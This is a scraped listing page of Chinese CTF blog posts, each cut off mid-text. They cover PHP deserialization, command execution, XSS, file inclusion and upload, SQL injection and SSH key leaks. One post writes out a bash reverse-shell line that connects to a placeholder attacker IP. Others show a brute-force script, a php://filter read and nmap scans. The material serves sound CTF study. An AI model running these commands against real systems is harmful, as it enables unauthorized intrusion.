CTF专题
文章平均质量分 71
YKingH
一杯敬明天 一杯敬过往 宽重我的身体 厚重了肩膀
展开
-
网安实验6-Linux防火墙访问控制
网安实验6,实现Linux防火墙的访问控制,河大同学看过来,详细教程在这里~原创 2023-03-31 18:42:16 · 674 阅读 · 1 评论 -
php session 反序列化
php_session 反序列化php 存储session的三种模式php_serialize经过serialize()函数序列化数组php键名+|+经过serialize()序列化处理后的值php_binary键名长度对应ASCII字符+键名+serialize()序列化的值三种存储模式的区别<?php ini_set("session.serialize_handler", "php"); //修改session存储类型为php类型 //ini_原创 2022-03-22 01:50:08 · 3848 阅读 · 0 评论 -
[CISCN2019 华北赛区 Day1 Web2]ikun
[CISCN2019 华北赛区 Day1 Web2]ikunbuu题目复现页面提示,一定要买到Lv6,查找几页,找不到Lv6的存在,尝试通过脚本爆破Lv6import requestsurl = 'http://57043135-ce0e-4b77-bcac-cd45e975d6f7.node4.buuoj.cn:81/shop?page='for i in range(1,1000): url = 'http://57043135-ce0e-4b77-bcac-cd45e975d6f7.原创 2022-03-19 01:07:09 · 3520 阅读 · 1 评论 -
php反序列化--字符串逃逸
php反序列化–字符串逃逸PHP反序列化的字符串逃逸,一共分有两种情况,情况一:过滤后字符串变多,情况二:过滤后字符变少(本篇文章默认已有反序列化相关知识基础)过滤后字符串变多以ctfshow-web262为例讲解:error_reporting(0);class message{ public $from; public $msg; public $to; public $token='user'; public function __construct(原创 2022-03-14 22:51:58 · 5075 阅读 · 5 评论 -
php反序列化基础学习与提高
PHP 反序列化1. php面向对象编程1) 面向对象编程的基本概念在面向对象编程的程序设计中,对象是一个由信息及对信息处理的描述所组成的整体,是对现实世界的抽象。(人和人类 每一个人就是一个对象,人类是对每个人的抽象概括)对象的三个主要特性:对象的行为:可以对 对象施加的那些操作,比如开灯、关灯,走、跑、跳就是行为对象的形态:施加哪些方法使对象如何响应,颜色、尺寸、外型,高矮胖瘦、高富帅、白富美对象的表示:对象的表示就相当于身份证,具体的区分在相同的行为与状态下有什么不同2)类和对象原创 2022-03-13 10:26:14 · 370 阅读 · 0 评论 -
Linux下反弹shell的原理
Linux下反弹shell的原理-bashshell是一种脚本语言,需要用解释器来解析这些脚本,常见的脚本解释器有:bash-Linux标准默认的shellsh-Unix标准默认的shellshell是Linux的外壳,为用户和内核之间的交互提供了一个接口反弹shell就是控制端监听在某TCP端口,别控端发起请求到该端口,并将其命令行的输入输出转到控制端bash建立反弹shellbash -i >& /dev/tcp/攻击端IP/攻击端监听端口 0>&1bash原创 2022-03-10 16:15:18 · 1418 阅读 · 1 评论 -
[网鼎杯 2020 青龙组]AreUSerialz
[网鼎杯 2020 青龙组]AreUSerialz首先代码审计<?php//包含了flag.php文件,表明flag存放的位置include("flag.php");//显示页面源代码highlight_file(__FILE__);//定义FileHandler类class FileHandler {//定义三个变量 protected $op; protected $filename; protected $content;//构造函数,创建新的对象时,原创 2022-03-10 11:11:18 · 123 阅读 · 0 评论 -
[网鼎杯 2020 朱雀组]phpweb-反弹shell
[网鼎杯 2020 朱雀组]phpweb通过反弹shell获取flag打开链接,显示一个不断刷新的页面,通过burp抓包查看通过对页面源代码的分析,发现在本页面中,通过post传入index.php中两个参数,通过对参数的修改,发现用到了call_user_func()函数[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sXIyF4mu-1646878901483)(D:\Blog\做题题解[网鼎杯 2020 朱雀组]phpweb\image-2022030920444原创 2022-03-10 10:26:09 · 5427 阅读 · 0 评论 -
ctfshow 文件上传
以ctfshow刷题平台为例介绍CTF比赛中文件上传的常见姿势原创 2022-02-02 00:40:52 · 1151 阅读 · 1 评论 -
ctfshow 爆破 web21-web28
爆破爆破考察手段burp intruder的使用编写脚本寻找满足条件的解伪随机web21burp抓包,发送到intruder模块,利用题中给出的脚本进行爆破,注意通过payload加工模块进行payload加工,采用base64编码。在返回的数据包中查找长度即可web22环境进不去,直接提交flagweb23利用给出的php脚本,进行进一步加工,爆破出满足条件的token<?phpfor($a=0;$a<10;$a++){ for($b=0;$b<10;$b原创 2022-01-29 00:11:18 · 2487 阅读 · 0 评论 -
ctfshow-命令执行
命令执行命令执行常见做题姿势*或?代替文件名全拼用其它的命令执行函数代替被过滤的函数用已知参数传入另一个无限制参数,构造木马编码绕过include 不用括号 分号可用?>代替cat替换内部字段分隔符$IFSgrep通配符匹配无字母数字的webshell$(( ))与整数运算脚本复制重命名绕过fopen路径读取文件高亮文件包含exit()mysql load_file读取文件命令接口等等web29error_reporting(0);if原创 2022-01-28 18:52:14 · 3842 阅读 · 0 评论 -
ctfshow-php特性
Web专项练习—ctfshow-php特性php绕过方法总结小数绕过进制绕过==、 = ==绕过%20空格绕过%0a换行绕过回车\空格+八进制绕过相对路径绕过php伪协议读取文件数组md5值为0弱类型匹配函数写????运算优先级漏洞反射类绕过call_user_func()绕过sha1()函数绕过变量覆盖sha1弱比较md5弱比较ereg()截断漏洞php内置类 FilesystemIterator压缩过滤器绕过空格代替url ‘_’ 绕过gettex原创 2022-01-26 17:34:38 · 5776 阅读 · 2 评论 -
XSS跨站之原理分类及攻击手法
web-xss跨站之原理分类及攻击手法XSS简介跨站脚本攻击(Cross Site Script),为和层叠样式表区分,安全领域叫做“XSS”。XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意脚本,从而在浏览网页时控制用户浏览器的一种攻击。一开始攻击的演示示例是跨域的,而现在由于JavaScript的强大功能以及网站前端应用的复杂化,是否跨域已经不重要。XSS原理解析攻击者通过向web页面中注入JavaScript代码(或者ActionScript、VBScript),来获取用户的原创 2021-11-09 16:19:32 · 3611 阅读 · 0 评论 -
web文件包含
文件包含文件包含漏洞原理文件包含:程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用过程,称为文件包含。文件包含漏洞:为使代码更加灵活,会将包含的文件设置为变量,用来进行动态调用,漏洞产生的原因正是函数通过变量引入文件时,没有对传入的文件名进行合理的校验,从而操作了意想之外的文件,导致文件泄露甚至恶意代码注入。PHP: include(), include_once(), require(), require_once(), fopen(),原创 2021-10-07 20:03:14 · 1341 阅读 · 0 评论 -
web文件上传
文件上传文件上传漏洞原理上传接口对于文件类型(通常是后缀名)检验存在疏漏导致的安全问题,一般表现在上传接口可使用某些方法绕过安全检验上传可动态解析的脚本文件,以达到任意代码的执行。一般来说,可解析的脚本文件是通过后缀名决定的,具体后缀名与服务器web应用的配置有关。上传流程客户端JavaScript检测(通常检测文件扩展名)服务端MIME类型检测(检测Content-Type内容)服务端目录路径检测(检测跟path参数相关的内容)服务端文件扩展名检测(检测跟文件extension相关的内容)原创 2021-09-07 19:03:00 · 508 阅读 · 0 评论 -
做题小结-web
做题小结-WEBhash碰撞什么是哈希碰撞哈希(hash),就是将不同的输入映射成独一无二的、固定长度的值(又称"哈希值")。它是最常见的软件运算之一。如果不同的输入得到了同一个哈希值,就发生了"哈希碰撞"。如果两个不同的用户,得到了同样的 token,就发生了哈希碰撞。服务器将把这两个用户视为同一个人,这意味着,用户 B 可以读取和更改用户 A 的信息。怎样防止哈希碰撞扩大hash值的取值空间,16个二进制位的哈希值,产生碰撞的可能性是 65536 分之一。也就是说,如果有65537个用原创 2021-07-28 18:27:51 · 112 阅读 · 0 评论 -
BUUCTF-[ACTF2020 新生赛]Include 1、读取源代码、php://input
BUUCTF-[ACTF2020 新生赛]Include 1打开页面后,点击tips出现:将admin.php改为flag.php,即可得到由base64编码过的结果用burp进行解码复制flag提交即可CTFHub-读取源代码利用php://filterhttp://challenge-4da2c855f0232708.sandbox.ctfhub.com:10800/?file=php://filter/resource=/flag[外链图片转存失败,源站可能有防盗链机制,建议原创 2021-07-18 18:22:32 · 828 阅读 · 3 评论 -
CTF-命令执行
CTF-命令执行什么是RCERCE英文全称:remote command/code execute,RCE又称远程命令/代码执行远程代码执行是指程序代码在处理输入输出的时候没有收到严格的控制,导致用户可以构造参数;包含有恶意代码的命令或者其他代码在服务器上执行。进而获取服务器权限、信息等,是发生在应用程序的逻辑层上的安全漏洞。远程命令执行分为远程命令执行ping和远程代码执行evel等命令注入和命令执行的区别:命令注入:是靠各种手法在本来执行的地方进行绕过命令绕过:是靠执行不可靠的函数导命令执原创 2021-07-10 23:08:57 · 786 阅读 · 0 评论 -
CTF—SQL注入(get)
CTF—WEB—SQL注入SQL注入漏洞介绍sql注入攻击指的是构建特殊的输入作为参数传入Web应用程序,而这些输入大都是sql语法里的一些组合,通过执行sql语句而执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。sql注入产生的原因,通常表现在:不当的类型处理不安全的数据库配置不合理的查询集处理不当的错误处理转义字符处理不合适多个提交处理不当信息探测扫描主机服务信息及服务版本nmap -sV 靶机ip地址快速扫描主机全部信息nmap原创 2021-07-09 23:45:36 · 828 阅读 · 0 评论 -
网络安全入门-HTTP基础
网络安全基础入门-HTTPHTTP基础初识url:统一资源定位系统,是因特网的万维网服务程序上用于指定信息位置的表示方法。最初是由蒂姆·伯纳斯·李发明用来作为万维网的地址。现在已经被互联网联盟编制为互联网标准。“/”用于路径分割符;“?”后追加参数键值对,键值对之间用“&”分割HTTP:超文本传输协议,是一个简单的请求-相应协议,通常运行在TCP之上,指定了客户端可能发送给服务器什么样的消息以及得到什么样的相应。请求和响应的消息的头以ASCII形式给出;而消息内容则具有一个类似MIME格式。原创 2021-07-09 01:12:25 · 252 阅读 · 0 评论 -
CTF—文件
CTF—文件包含文件包含漏洞定义:在通过php函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入危险函数include()include_once()require()require_once()解题思路本地文件包含:直接读取目标机上的Flag文件远程文件包含:指定第三方服务器上可运行的PHP木马,拿到webshell,查看flag文件php.iniallow_url_fopen = on/off 允许ur原创 2021-07-08 00:01:47 · 896 阅读 · 1 评论 -
ctf—SQL注入(post)
ctf—SQL注入(post)SQL注入漏洞介绍 sql注入攻击指用用户构建特殊的输入作为参数传入web应用程序,通过执行sql语句,而执行攻击者所要的操作,主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。 任何一个用户可以输入的位置都可以是注入点。比如url中,以及http报文中,post传递的参数1.信息探测扫描主机开放的全部端口nmap -T4 -p -靶场IP快速扫描主机全部信息nmap -T4 -A -v 靶场IP探测敏感信息nikto -host ht原创 2021-07-07 00:13:28 · 1082 阅读 · 0 评论 -
CTF—SSH私钥泄露
CTF—SSH私钥泄露SSH协议:SSH是Secure Shell的缩写,由IETF的网络小组所制定,SSH为建立在应用层基础上的安全协议,目前较为可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用SSH协议可以有效防止远程管理过程中的信息泄露的问题。基于 TCP 22号端口的服务。SSH协议认证机制基于口令的安全验证:只要知道自己的账号和口令,就可以远程登陆到主机。所有传输的数据都会被加密,但不能保证你正在连接的服务器就是你想连接的服务器。可能会有别的服务器来冒充真的服务器,也就是受到“中间原创 2021-07-06 00:30:09 · 852 阅读 · 0 评论